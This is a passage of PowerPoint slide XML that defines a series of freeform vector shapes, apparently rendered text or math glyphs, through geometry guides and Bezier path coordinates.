                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="38"/>
                    <a:pt x="76" y="49"/>
                    <a:pt x="90" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="49"/>
                    <a:pt x="115" y="38"/>
                    <a:pt x="115"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3" name="Freeform 164">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04562528-F801-4813-B5E9-C8DCBC4C8E3F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId60"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3970337" y="1455738"/>
              <a:ext cx="77788" cy="88900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 204 w 204"/>
                <a:gd name="T1" fmla="*/ 112 h 223"/>
                <a:gd name="T2" fmla="*/ 102 w 204"/>
                <a:gd name="T3" fmla="*/ 0 h 223"/>
                <a:gd name="T4" fmla="*/ 0 w 204"/>
                <a:gd name="T5" fmla="*/ 112 h 223"/>
                <a:gd name="T6" fmla="*/ 102 w 204"/>
                <a:gd name="T7" fmla="*/ 223 h 223"/>
                <a:gd name="T8" fmla="*/ 204 w 204"/>
                <a:gd name="T9" fmla="*/ 112 h 223"/>
                <a:gd name="T10" fmla="*/ 102 w 204"/>
                <a:gd name="T11" fmla="*/ 192 h 223"/>
                <a:gd name="T12" fmla="*/ 34 w 204"/>
                <a:gd name="T13" fmla="*/ 109 h 223"/>
                <a:gd name="T14" fmla="*/ 102 w 204"/>
                <a:gd name="T15" fmla="*/ 31 h 223"/>
                <a:gd name="T16" fmla="*/ 170 w 204"/>
                <a:gd name="T17" fmla="*/ 109 h 223"/>
                <a:gd name="T18" fmla="*/ 102 w 204"/>
                <a:gd name="T19" fmla="*/ 19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23">
                  <a:moveTo>
                    <a:pt x="204" y="112"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="50"/>
                    <a:pt x="158" y="0"/>
                    <a:pt x="102" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="0"/>
                    <a:pt x="0" y="50"/>
                    <a:pt x="0" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="175"/>
                    <a:pt x="47" y="223"/>
                    <a:pt x="102" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="223"/>
                    <a:pt x="204" y="175"/>
                    <a:pt x="204" y="112"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="102" y="192"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="192"/>
                    <a:pt x="34" y="155"/>
                    <a:pt x="34" y="109"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="63"/>
                    <a:pt x="66" y="31"/>
                    <a:pt x="102" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="31"/>
                    <a:pt x="170" y="63"/>
                    <a:pt x="170" y="109"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="155"/>
                    <a:pt x="139" y="192"/>
                    <a:pt x="102"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4" name="Freeform 165">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64FFD157-4CFB-448F-B877-E172D059B64F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId61"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4062412" y="1457325"/>
              <a:ext cx="95250" cy="85725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 76 w 249"/>
                <a:gd name="T1" fmla="*/ 26 h 218"/>
                <a:gd name="T2" fmla="*/ 57 w 249"/>
                <a:gd name="T3" fmla="*/ 3 h 218"/>
                <a:gd name="T4" fmla="*/ 20 w 249"/>
                <a:gd name="T5" fmla="*/ 3 h 218"/>
                <a:gd name="T6" fmla="*/ 0 w 249"/>
                <a:gd name="T7" fmla="*/ 18 h 218"/>
                <a:gd name="T8" fmla="*/ 20 w 249"/>
                <a:gd name="T9" fmla="*/ 33 h 218"/>
                <a:gd name="T10" fmla="*/ 42 w 249"/>
                <a:gd name="T11" fmla="*/ 33 h 218"/>
                <a:gd name="T12" fmla="*/ 42 w 249"/>
                <a:gd name="T13" fmla="*/ 187 h 218"/>
                <a:gd name="T14" fmla="*/ 20 w 249"/>
                <a:gd name="T15" fmla="*/ 187 h 218"/>
                <a:gd name="T16" fmla="*/ 0 w 249"/>
                <a:gd name="T17" fmla="*/ 203 h 218"/>
                <a:gd name="T18" fmla="*/ 20 w 249"/>
                <a:gd name="T19" fmla="*/ 218 h 218"/>
                <a:gd name="T20" fmla="*/ 99 w 249"/>
                <a:gd name="T21" fmla="*/ 218 h 218"/>
                <a:gd name="T22" fmla="*/ 119 w 249"/>
                <a:gd name="T23" fmla="*/ 203 h 218"/>
                <a:gd name="T24" fmla="*/ 98 w 249"/>
                <a:gd name="T25" fmla="*/ 187 h 218"/>
                <a:gd name="T26" fmla="*/ 76 w 249"/>
                <a:gd name="T27" fmla="*/ 187 h 218"/>
                <a:gd name="T28" fmla="*/ 76 w 249"/>
                <a:gd name="T29" fmla="*/ 99 h 218"/>
                <a:gd name="T30" fmla="*/ 139 w 249"/>
                <a:gd name="T31" fmla="*/ 30 h 218"/>
                <a:gd name="T32" fmla="*/ 172 w 249"/>
                <a:gd name="T33" fmla="*/ 74 h 218"/>
                <a:gd name="T34" fmla="*/ 172 w 249"/>
                <a:gd name="T35" fmla="*/ 187 h 218"/>
                <a:gd name="T36" fmla="*/ 153 w 249"/>
                <a:gd name="T37" fmla="*/ 187 h 218"/>
                <a:gd name="T38" fmla="*/ 132 w 249"/>
                <a:gd name="T39" fmla="*/ 203 h 218"/>
                <a:gd name="T40" fmla="*/ 153 w 249"/>
                <a:gd name="T41" fmla="*/ 218 h 218"/>
                <a:gd name="T42" fmla="*/ 229 w 249"/>
                <a:gd name="T43" fmla="*/ 218 h 218"/>
                <a:gd name="T44" fmla="*/ 249 w 249"/>
                <a:gd name="T45" fmla="*/ 203 h 218"/>
                <a:gd name="T46" fmla="*/ 229 w 249"/>
                <a:gd name="T47" fmla="*/ 187 h 218"/>
                <a:gd name="T48" fmla="*/ 207 w 249"/>
                <a:gd name="T49" fmla="*/ 187 h 218"/>
                <a:gd name="T50" fmla="*/ 207 w 249"/>
                <a:gd name="T51" fmla="*/ 72 h 218"/>
                <a:gd name="T52" fmla="*/ 142 w 249"/>
                <a:gd name="T53" fmla="*/ 0 h 218"/>
                <a:gd name="T54" fmla="*/ 76 w 249"/>
                <a:gd name="T55" fmla="*/ 2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9" h="218">
                  <a:moveTo>
                    <a:pt x="76" y="26"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="10"/>
                    <a:pt x="76" y="3"/>
                    <a:pt x="57" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="33"/>
                    <a:pt x="13" y="33"/>
                    <a:pt x="20" y="33"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="42" y="33"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="187"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="187"/>
                    <a:pt x="0" y="187"/>
                    <a:pt x="0" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="13" y="218"/>
                    <a:pt x="20" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="99" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="218"/>
                    <a:pt x="119" y="218"/>
                    <a:pt x="119" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="187"/>
                    <a:pt x="106" y="187"/>
                    <a:pt x="98" y="187"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="76" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76" y="99"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="49"/>
                    <a:pt x="113" y="30"/>
                    <a:pt x="139" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="30"/>
                    <a:pt x="172" y="44"/>
                    <a:pt x="172" y="74"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="172" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153" y="187"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="187"/>
                    <a:pt x="132" y="187"/>
                    <a:pt x="132" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="218"/>
                    <a:pt x="146" y="218"/>
                    <a:pt x="153" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="229" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="236" y="218"/>
                    <a:pt x="249" y="218"/>
                    <a:pt x="249" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="249" y="187"/>
                    <a:pt x="237" y="187"/>
                    <a:pt x="229" y="187"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="207" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207" y="72"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="21"/>
                    <a:pt x="181" y="0"/>
                    <a:pt x="142" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="0"/>
                    <a:pt x="86" y="17"/>
                    <a:pt x="76" y="2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5" name="Freeform 166">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7812B1AF-8BAE-41D6-B80C-EA31D1402510}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId62"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4168775" y="1406525"/>
              <a:ext cx="49213" cy="152400"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 130 w 130"/>
                <a:gd name="T1" fmla="*/ 20 h 387"/>
                <a:gd name="T2" fmla="*/ 110 w 130"/>
                <a:gd name="T3" fmla="*/ 0 h 387"/>
                <a:gd name="T4" fmla="*/ 20 w 130"/>
                <a:gd name="T5" fmla="*/ 0 h 387"/>
                <a:gd name="T6" fmla="*/ 0 w 130"/>
                <a:gd name="T7" fmla="*/ 15 h 387"/>
                <a:gd name="T8" fmla="*/ 20 w 130"/>
                <a:gd name="T9" fmla="*/ 30 h 387"/>
                <a:gd name="T10" fmla="*/ 95 w 130"/>
                <a:gd name="T11" fmla="*/ 30 h 387"/>
                <a:gd name="T12" fmla="*/ 95 w 130"/>
                <a:gd name="T13" fmla="*/ 357 h 387"/>
                <a:gd name="T14" fmla="*/ 20 w 130"/>
                <a:gd name="T15" fmla="*/ 357 h 387"/>
                <a:gd name="T16" fmla="*/ 0 w 130"/>
                <a:gd name="T17" fmla="*/ 372 h 387"/>
                <a:gd name="T18" fmla="*/ 20 w 130"/>
                <a:gd name="T19" fmla="*/ 387 h 387"/>
                <a:gd name="T20" fmla="*/ 110 w 130"/>
                <a:gd name="T21" fmla="*/ 387 h 387"/>
                <a:gd name="T22" fmla="*/ 130 w 130"/>
                <a:gd name="T23" fmla="*/ 367 h 387"/>
                <a:gd name="T24" fmla="*/ 130 w 130"/>
                <a:gd name="T25" fmla="*/ 20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387">
                  <a:moveTo>
                    <a:pt x="130" y="20"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="5"/>
                    <a:pt x="127" y="0"/>
                    <a:pt x="110" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="30"/>
                    <a:pt x="12" y="30"/>
                    <a:pt x="20" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="95" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95" y="357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="357"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="357"/>
                    <a:pt x="0" y="357"/>
                    <a:pt x="0" y="372"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="387"/>
                    <a:pt x="12" y="387"/>
                    <a:pt x="20" y="387"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="110" y="387"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="387"/>
                    <a:pt x="130" y="383"/>
                    <a:pt x="130" y="367"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="130" y="2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6" name="Freeform 167">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A88211E5-BA8B-4202-A610-2084D173C044}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId63"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4268787" y="1460500"/>
              <a:ext cx="85725" cy="44450"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 201 w 223"/>
                <a:gd name="T1" fmla="*/ 35 h 111"/>
                <a:gd name="T2" fmla="*/ 223 w 223"/>
                <a:gd name="T3" fmla="*/ 17 h 111"/>
                <a:gd name="T4" fmla="*/ 198 w 223"/>
                <a:gd name="T5" fmla="*/ 0 h 111"/>
                <a:gd name="T6" fmla="*/ 25 w 223"/>
                <a:gd name="T7" fmla="*/ 0 h 111"/>
                <a:gd name="T8" fmla="*/ 0 w 223"/>
                <a:gd name="T9" fmla="*/ 17 h 111"/>
                <a:gd name="T10" fmla="*/ 22 w 223"/>
                <a:gd name="T11" fmla="*/ 35 h 111"/>
                <a:gd name="T12" fmla="*/ 201 w 223"/>
                <a:gd name="T13" fmla="*/ 35 h 111"/>
                <a:gd name="T14" fmla="*/ 198 w 223"/>
                <a:gd name="T15" fmla="*/ 111 h 111"/>
                <a:gd name="T16" fmla="*/ 223 w 223"/>
                <a:gd name="T17" fmla="*/ 93 h 111"/>
                <a:gd name="T18" fmla="*/ 201 w 223"/>
                <a:gd name="T19" fmla="*/ 76 h 111"/>
                <a:gd name="T20" fmla="*/ 22 w 223"/>
                <a:gd name="T21" fmla="*/ 76 h 111"/>
                <a:gd name="T22" fmla="*/ 0 w 223"/>
                <a:gd name="T23" fmla="*/ 93 h 111"/>
                <a:gd name="T24" fmla="*/ 25 w 223"/>
                <a:gd name="T25" fmla="*/ 111 h 111"/>
                <a:gd name="T26" fmla="*/ 198 w 223"/>
                <a:gd name="T27"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11">
                  <a:moveTo>
                    <a:pt x="201" y="35"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="35"/>
                    <a:pt x="223" y="35"/>
                    <a:pt x="223" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="223" y="0"/>
                    <a:pt x="205" y="0"/>
                    <a:pt x="198" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="25" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="35"/>
                    <a:pt x="16" y="35"/>
                    <a:pt x="22" y="35"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="201" y="35"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="198" y="111"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="111"/>
                    <a:pt x="223" y="111"/>
                    <a:pt x="223" y="93"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="223" y="76"/>
                    <a:pt x="207" y="76"/>
                    <a:pt x="201" y="76"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="22" y="76"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="76"/>
                    <a:pt x="0" y="76"/>
                    <a:pt x="0" y="93"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="111"/>
                    <a:pt x="18" y="111"/>
                    <a:pt x="25" y="111"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="198" y="11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7" name="Freeform 168">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CA59F4C-02FF-4D50-84DF-C478D546FC09}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId64"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4371975" y="1420813"/>
              <a:ext cx="80963" cy="122238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 8 w 210"/>
                <a:gd name="T1" fmla="*/ 281 h 310"/>
                <a:gd name="T2" fmla="*/ 0 w 210"/>
                <a:gd name="T3" fmla="*/ 294 h 310"/>
                <a:gd name="T4" fmla="*/ 21 w 210"/>
                <a:gd name="T5" fmla="*/ 310 h 310"/>
                <a:gd name="T6" fmla="*/ 190 w 210"/>
                <a:gd name="T7" fmla="*/ 310 h 310"/>
                <a:gd name="T8" fmla="*/ 210 w 210"/>
                <a:gd name="T9" fmla="*/ 289 h 310"/>
                <a:gd name="T10" fmla="*/ 210 w 210"/>
                <a:gd name="T11" fmla="*/ 276 h 310"/>
                <a:gd name="T12" fmla="*/ 193 w 210"/>
                <a:gd name="T13" fmla="*/ 256 h 310"/>
                <a:gd name="T14" fmla="*/ 175 w 210"/>
                <a:gd name="T15" fmla="*/ 279 h 310"/>
                <a:gd name="T16" fmla="*/ 57 w 210"/>
                <a:gd name="T17" fmla="*/ 279 h 310"/>
                <a:gd name="T18" fmla="*/ 155 w 210"/>
                <a:gd name="T19" fmla="*/ 197 h 310"/>
                <a:gd name="T20" fmla="*/ 210 w 210"/>
                <a:gd name="T21" fmla="*/ 97 h 310"/>
                <a:gd name="T22" fmla="*/ 98 w 210"/>
                <a:gd name="T23" fmla="*/ 0 h 310"/>
                <a:gd name="T24" fmla="*/ 0 w 210"/>
                <a:gd name="T25" fmla="*/ 83 h 310"/>
                <a:gd name="T26" fmla="*/ 23 w 210"/>
                <a:gd name="T27" fmla="*/ 107 h 310"/>
                <a:gd name="T28" fmla="*/ 45 w 210"/>
                <a:gd name="T29" fmla="*/ 84 h 310"/>
                <a:gd name="T30" fmla="*/ 38 w 210"/>
                <a:gd name="T31" fmla="*/ 68 h 310"/>
                <a:gd name="T32" fmla="*/ 96 w 210"/>
                <a:gd name="T33" fmla="*/ 30 h 310"/>
                <a:gd name="T34" fmla="*/ 175 w 210"/>
                <a:gd name="T35" fmla="*/ 97 h 310"/>
                <a:gd name="T36" fmla="*/ 118 w 210"/>
                <a:gd name="T37" fmla="*/ 188 h 310"/>
                <a:gd name="T38" fmla="*/ 8 w 210"/>
                <a:gd name="T39" fmla="*/ 281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 h="310">
                  <a:moveTo>
                    <a:pt x="8" y="281"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="285"/>
                    <a:pt x="0" y="287"/>
                    <a:pt x="0" y="294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="310"/>
                    <a:pt x="13" y="310"/>
                    <a:pt x="21" y="310"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="190" y="310"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="310"/>
                    <a:pt x="210" y="305"/>
                    <a:pt x="210" y="289"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="210" y="276"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="210" y="267"/>
                    <a:pt x="210" y="256"/>
                    <a:pt x="193" y="256"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="256"/>
                    <a:pt x="175" y="265"/>
                    <a:pt x="175" y="279"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="57" y="279"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="254"/>
                    <a:pt x="134" y="217"/>
                    <a:pt x="155" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="169"/>
                    <a:pt x="210" y="137"/>
                    <a:pt x="210" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="210" y="37"/>
                    <a:pt x="159" y="0"/>
                    <a:pt x="98" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="0"/>
                    <a:pt x="0" y="40"/>
                    <a:pt x="0" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="101"/>
                    <a:pt x="14" y="107"/>
                    <a:pt x="23" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="107"/>
                    <a:pt x="45" y="98"/>
                    <a:pt x="45" y="84"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="78"/>
                    <a:pt x="42" y="72"/>
                    <a:pt x="38" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="45"/>
                    <a:pt x="69" y="30"/>
                    <a:pt x="96" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="137" y="30"/>
                    <a:pt x="175" y="53"/>
                    <a:pt x="175" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="132"/>
                    <a:pt x="151" y="161"/>
                    <a:pt x="118" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8" y="28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8" name="Freeform 169">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5B40D44-DE59-440E-A9C6-04BB9BE09926}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId65"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1679575" y="1755775"/>
              <a:ext cx="23813" cy="23813"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 62 w 62"/>
                <a:gd name="T1" fmla="*/ 32 h 63"/>
                <a:gd name="T2" fmla="*/ 31 w 62"/>
                <a:gd name="T3" fmla="*/ 0 h 63"/>
                <a:gd name="T4" fmla="*/ 0 w 62"/>
                <a:gd name="T5" fmla="*/ 31 h 63"/>
                <a:gd name="T6" fmla="*/ 31 w 62"/>
                <a:gd name="T7" fmla="*/ 63 h 63"/>
                <a:gd name="T8" fmla="*/ 62 w 62"/>
                <a:gd name="T9" fmla="*/ 32 h 63"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="62" h="63">
                  <a:moveTo>
                    <a:pt x="62" y="32"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="13"/>
                    <a:pt x="47" y="0"/>
                    <a:pt x="31" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="16"/>
                    <a:pt x="0" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="50"/>
                    <a:pt x="15" y="63"/>
                    <a:pt x="31" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="63"/>
                    <a:pt x="62" y="47"/>
                    <a:pt x="62" y="3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79" name="Freeform 170">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24442B71-8FA4-4B56-8760-5F3EBC0DD33B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId66"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1779587" y="1755775"/>
              <a:ext cx="23813" cy="23813"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 62 w 62"/>
                <a:gd name="T1" fmla="*/ 32 h 63"/>
                <a:gd name="T2" fmla="*/ 32 w 62"/>
                <a:gd name="T3" fmla="*/ 0 h 63"/>
                <a:gd name="T4" fmla="*/ 0 w 62"/>
                <a:gd name="T5" fmla="*/ 31 h 63"/>
                <a:gd name="T6" fmla="*/ 31 w 62"/>
                <a:gd name="T7" fmla="*/ 63 h 63"/>
                <a:gd name="T8" fmla="*/ 62 w 62"/>
                <a:gd name="T9" fmla="*/ 32 h 63"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="62" h="63">
                  <a:moveTo>
                    <a:pt x="62" y="32"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="13"/>
                    <a:pt x="47" y="0"/>
                    <a:pt x="32" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="0" y="16"/>
                    <a:pt x="0" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="50"/>
                    <a:pt x="15" y="63"/>
                    <a:pt x="31" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="63"/>
                    <a:pt x="62" y="47"/>
                    <a:pt x="62" y="3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0" name="Freeform 171">
              <a:extLst>
